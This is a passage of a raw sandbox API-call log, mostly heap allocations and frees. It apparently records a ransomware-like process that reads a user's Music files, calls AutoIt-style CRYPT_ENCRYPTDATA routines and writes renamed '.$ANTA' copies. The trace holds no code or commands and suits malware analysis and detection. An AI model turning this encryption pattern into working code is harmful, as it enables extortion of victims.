Size=0x30) returned 0x4391c78 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0110.253] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\fr5qk.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.254] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0110.255] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0110.255] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0110.255] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0110.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0110.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0110.258] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0110.258] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0xe295, lpOverlapped=0x0) returned 1 [0110.260] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe295) returned 0x4516010 [0110.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe295) returned 0x45242b0 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.263] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe295) returned 0x4516010 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0110.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0110.264] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0110.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0110.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe295) returned 0x4516010 [0110.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe295) returned 0x4532550 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0110.268] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0110.268] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.268] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0110.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0110.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0110.269] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0110.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0110.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.269] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0110.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.270] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0110.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0110.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.271] RtlAllocateHeap 